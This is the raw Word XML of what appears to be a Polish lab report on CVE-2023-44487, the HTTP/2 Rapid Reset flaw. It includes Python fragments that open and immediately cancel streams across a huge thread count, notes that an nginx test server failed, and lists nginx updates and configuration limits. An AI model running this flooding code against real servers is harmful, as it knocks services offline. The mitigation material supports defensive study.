    <w:p w14:paraId="2516B892" w14:textId="73EA9A1A" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD89C51" w14:textId="03311957" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2Connection: </w:t>
      </w:r>
      <w:r>
        <w:t>Inicjalizuje nową sesję HTTP/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5CAE1C" w14:textId="20CD082B" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nitiate_connection: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F7C5E">
        <w:t xml:space="preserve">wysyła ramkę inicjującą połączenie </w:t>
      </w:r>
      <w:r>
        <w:t>HTTP/2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6323AA32" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E"/>
    <w:p w14:paraId="7C81364D" w14:textId="003ACC19" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tworzenie i wysyłanie żądania GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDEBDD4" w14:textId="232018C7" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r>
        <w:t>Klient tworzy nowy strumień i wysyła żądanie HTTP/2 GET do serwera.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9DD001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2F7C5E">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Create a new stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7341AA80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stream_id = conn.get_next_available_stream_id()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3936DF2B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conn.send_headers(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091C5967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stream_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9E83A9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[(':method', 'GET'), (':authority', url), (':path', '/'), (':scheme', 'https')],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DA990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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAC2207" w14:textId="35CEB182" w:rsid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sock.sendall(conn.data_to_send())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D0FA48" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE47FE2" w14:textId="22842661" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>send_headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7C5E">
        <w:t xml:space="preserve"> Wysyła </w:t>
      </w:r>
      <w:r>
        <w:t>nagłówki HTTP/2, które zawierają żądanie GET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04518E4F" w14:textId="46F77CE4" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Odbiór danych i resetowanie strumienia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A13B1C1" w14:textId="58AA8B7C" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r>
        <w:t xml:space="preserve">Klient odbiera dane od serwera. Gdy otrzymuje odpowiedź na żądanie GET, natychmiast wysyła ramkę </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESET_STREAM</w:t>
      </w:r>
      <w:r>
        <w:t>, aby zakończyć strumień.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253AA56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2F7C5E">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Read some data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBA86CD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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D22CFA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data = sock.recv(65535)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14701A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if not data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311D63E5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    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8E28D9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</w:p>
    <w:p w14:paraId="1BC1F2D0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events = conn.receive_data(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8CD134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for event in events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0742A836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    if isinstance(event, RequestReceived):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233BDDE2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2F7C5E">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            # Cancel the stream with error code for CANCEL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABBFEC4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        conn.reset_stream(event.stream_id, error_code=ErrorCodes.CANCEL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292992FA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    elif isinstance(event, StreamReset):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF83845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        print(f"Stream {event.stream_id} cancelled.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F93726D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</w:p>
    <w:p w14:paraId="5A575BF0" w14:textId="3699A4C0" w:rsid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sock.sendall(conn.data_to_send())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E522F" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0A5F26" w14:textId="54665AF0" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reset_stream:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7C5E">
        <w:t xml:space="preserve"> Wysyła ramkę RESET_STREAM, aby z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">akończyć strumień z kodem błędu </w:t>
      </w:r>
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CANCEL</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF1D1B" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E"/>
    <w:p w14:paraId="2ACD063E" w14:textId="78CD3030" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zużycie zasobów serwera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E9CFB4" w14:textId="0CBF805E" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r>
        <w:t>Atakujący szybko inicjuje i resetuje wiele strumieni, serwer jest zmuszony do ciągłego przetwarzania tych ramek, co prowadzi do intensywnego zużycia zasobów procesora i pamięci. W efekcie serwer odmawia świadczenia usług (DoS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E70ED" w14:textId="37B36CC1" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tworzenie wątków</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70635FE6" w14:textId="076D9255" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r>
        <w:t>Kod tworzy wiele wątków, które równocześnie wykonują powyżej opisane kroki, zwiększając przy tym intensywność ataku.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3B977" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E180539" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8DDCA4" w14:textId="0F7EC9FF" w:rsidR="002F7C5E" w:rsidRPr="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E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2F7C5E">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># Create 50 threads running root_function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765673DD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threads = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA7E1E3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for i in range(10000000000000000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91C45D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thread = threading.Thread(target=root_function)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F270A36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thread.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BF9F11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 xml:space="preserve">    threads.append(thread)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D464D22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</w:p>
    <w:p w14:paraId="5D09D1DD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color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:color w:val="ADADAD" w:themeColor="background2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Keep the main thread alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC4F42F" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRPr="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for thread in threads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6464A8BA" w14:textId="0AD8944E" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>thread.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206131B0" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E"/>
    <w:p w14:paraId="050F8C7B" w14:textId="4FC54204" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">threading.Thread: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F7C5E">
        <w:t>Tworzy nowy wątek dla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> każdej instancji ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root_function</w:t>
      </w:r>
      <w:r>
        <w:t>’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4E8BED" w14:textId="7F484D90" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>start():</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uruchamia wątek.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB778F" w14:textId="37F092B4" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>oin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Utrzymuje główny wątek jako aktywny do zakończenia wszystkich wątków.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BFDB49" w14:textId="77777777" w:rsidR="002F7C5E" w:rsidRDefault="002F7C5E" w:rsidP="002F7C5E"/>
    <w:p w14:paraId="32F406D5" w14:textId="64AFC86F" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Przykładowy atak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663B03AD" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE"/>
    <w:p w14:paraId="51913C88" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRPr="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE"/>
    <w:p w14:paraId="5BDDE399" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06772FB5" wp14:editId="5F09237E">
            <wp:extent cx="5760720" cy="2539365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1305460682" name="Obraz 1" descr="Obraz zawierający tekst, oprogramowanie, Oprogramowanie multimedialn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0682" name="Obraz 1" descr="Obraz zawierający tekst, oprogramowanie, Oprogramowanie multimedialne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0471" w14:textId="79FB042A" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50B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4160C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - serwer nginx przed przeprowadzeniem ataku</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD94DDE" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="707440D7" wp14:editId="2AED1038">
            <wp:extent cx="5760720" cy="2994660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="687422193" name="Obraz 3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2193" name="Obraz 3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9BAE" w14:textId="18B57A6E" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50B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4160C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - serwer nginx po ataku CVE-2023-44487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D109F4A" w14:textId="72911B2E" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:r>
        <w:t xml:space="preserve">Jak widać na powyższych zrzutach ekranu, atak na serwer się powiódł. Serwer wyświetlił błąd 500 Internal Server Error oznacza on, iż serwer Nginx nie jest w stanie prawidłowo przetworzyć żądania HTTP. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACF1B6B" w14:textId="33FDD580" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:r>
        <w:t>Na zrzucie ekranu pokazującym efekt ataku widzimy w terminalu błędy wskazujące na nadmierną liczbę otwartych plików:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59746C0B" w14:textId="6BCC8454" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E50BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An error occurred: [Errno 24] Too many open files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D89153E" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206BBB63" w14:textId="474E9BAD" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:r w:rsidRPr="007E50BE">
        <w:t>Te</w:t>
      </w:r>
      <w:r>
        <w:t>n komunikat błędu oznacza, że system operacyjny osiągnął maksymalną liczbę otwartych plików, co jest konsekwencją ataku polegającego na szybkim otwieraniu i zamykaniu wielu połączeń HTTP/2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E1D94" w14:textId="77777777" w:rsidR="009A2619" w:rsidRDefault="009A2619" w:rsidP="00E93C75"/>
    <w:p w14:paraId="32B9D659" w14:textId="799B63D2" w:rsidR="009A2619" w:rsidRDefault="009A2619" w:rsidP="009A2619">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Patch podatności CVE-</w:t>
      </w:r>
      <w:r w:rsidR="007E50BE">
        <w:t>2023-44487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E37270" w14:textId="131F9955" w:rsidR="009A2619" w:rsidRDefault="007E50BE" w:rsidP="009A2619">
      <w:r>
        <w:t>Aby zabezpieczyć się przed podatnością CVE-2023-44487, znaną również jako HTTP/2 Rapid Reset Attack, konieczne jest zastosowanie poprawek oraz zmian w konfiguracji serwera. Oto kluczowe kroki:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1262880D" w14:textId="0A3F9449" w:rsidR="009A2619" w:rsidRDefault="009A2619" w:rsidP="009A2619">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Aktualizacja </w:t>
      </w:r>
      <w:r w:rsidR="007E50BE">
        <w:t>oprogramowania</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D74006" w14:textId="03D1D887" w:rsidR="009A2619" w:rsidRDefault="007E50BE" w:rsidP="009A2619">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Aktualizacja Nginx do najnowszej wersji, która zawiera poprawki zabezpieczeń. Nginx opublikował aktualizację, które adresują tę podatność.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658EDFC4" w14:textId="77777777" w:rsidR="009A2619" w:rsidRPr="00842F30" w:rsidRDefault="009A2619" w:rsidP="009A2619">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r w:rsidRPr="00842F30">
        <w:t>sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0667ACFA" w14:textId="352B5BF6" w:rsidR="009A2619" w:rsidRPr="007E50BE" w:rsidRDefault="009A2619" w:rsidP="009A2619">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r w:rsidRPr="007E50BE">
        <w:t>sudo apt upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A15AF" w14:textId="77777777" w:rsidR="009A2619" w:rsidRPr="007E50BE" w:rsidRDefault="009A2619" w:rsidP="009A2619"/>
    <w:p w14:paraId="79A52583" w14:textId="61EB85B2" w:rsidR="009A2619" w:rsidRDefault="009A2619" w:rsidP="009A2619">
      <w:pPr>
        <w:pStyle w:val="Nagwek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Ręczne patchowanie </w:t>
      </w:r>
      <w:r w:rsidR="007E50BE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E472432" w14:textId="77F441A6" w:rsidR="009A2619" w:rsidRDefault="007E50BE" w:rsidP="009A2619">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>W konfiguracji serwera Nginx, należy zwiększyć limit równoczesnych strumieni oraz ograniczyć maksymalną liczbę żądań na utrzymywane połączenie HTTP/2. Zmiany będą dokonane w pliku konfiguracyjnym ‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nginx.conf</w:t>
      </w:r>
      <w:r>
        <w:t>’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9125B" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r>
        <w:t>http {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1EE52" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3440A1A5" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    http2_max_concurrent_streams 128;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E861953" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    keepalive_requests 1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69864B95" w14:textId="77777777" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02141026" w14:textId="600E8970" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:pStyle w:val="Cytat"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B134FE" w14:textId="1FD7D122" w:rsidR="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:pPr>
        <w:pStyle w:val="Nagwek3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Monitorowanie i dodatkowe zabezpieczenia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B657917" w14:textId="42E19843" w:rsidR="007E50BE" w:rsidRPr="007E50BE" w:rsidRDefault="007E50BE" w:rsidP="007E50BE">
      <w:r>
        <w:t>Implementacja narzędzi służących do monitorowania oraz ograniczających liczbę połączeń z jednego adresu IP jest bardzo przydatna w obronie przed atakami DDoS. Cloudflare lub AWS Shield może dodatkowo pomóc w zabezpieczeniu serwera.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0511BF" w14:textId="118F6F61" w:rsidR="00E93C75" w:rsidRDefault="00500D12" w:rsidP="00500D12">
      <w:pPr>
        <w:pStyle w:val="Nagwek2"/>
      </w:pPr>
      <w:r>
        <w:t>Podsumowanie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE672BE" w14:textId="5C41E581" w:rsidR="00E93C75" w:rsidRPr="00E93C75" w:rsidRDefault="00A0381C" w:rsidP="00E93C75">
      <w:r>
        <w:t>CVE-2023-44487 to podatność w implementacji protokołu HTTP/2, która pozwala atakującym na przeprowadzenie ataku typu Denial of Service. Atak polega na szybkim tworzeniu i resetowaniu wielu strumieni HTTP/2, co prowadzi do przeciążenia serwera i skutkuje odmową usług. Podatność ta dotyczy wielu serwerów HTTP/2, w tym Nginx. Aby zabezpieczyć się przed tym atakiem, zaleca się aktualizację serwera do najnowszej wersji, modyfikację konfiguracji w celu ograniczenia liczby równoczesnych strumieni oraz wdrożenie narzędzi monitorujących i zabezpieczających przed podejrzanym ruchem sieciowym.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E93C75" w:rsidRPr="00E9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A995D" w14:textId="77777777" w:rsidR="00650B42" w:rsidRDefault="00650B42" w:rsidP="00872E84">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6D420DE6" w14:textId="77777777" w:rsidR="00650B42" w:rsidRDefault="00650B42" w:rsidP="0087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9AE22" w14:textId="77777777" w:rsidR="00650B42" w:rsidRDefault="00650B42" w:rsidP="00872E84">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3890E526" w14:textId="77777777" w:rsidR="00650B42" w:rsidRDefault="00650B42" w:rsidP="0087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4E5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EAF4109E"/>
    <w:lvl w:ilvl="0" w:tplc="CB64371E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349" w:hanging="360"/>
